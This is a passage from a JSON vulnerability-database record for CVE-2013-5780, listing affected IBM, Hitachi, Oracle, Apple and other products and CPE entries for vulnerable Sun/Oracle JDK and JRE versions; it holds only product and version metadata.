"version": "7.0.18" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.11" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus developer version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cosminexus developer professional version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "cosminexus application server enterprise version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "cosminexus developer professional version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus studio version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer professional version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.33" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "cosminexus developer professional version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.37" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere process server on z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli service automation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "cosminexus application server standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "cosminexus client version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "jrockit r28.2.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "cosminexus client version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" } ], "sources": [ { "db": "BID", "id": "63115" }, { "db": "CNNVD", "id": "CNNVD-201310-360" }, { "db": "NVD", "id": "CVE-2013-5780" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 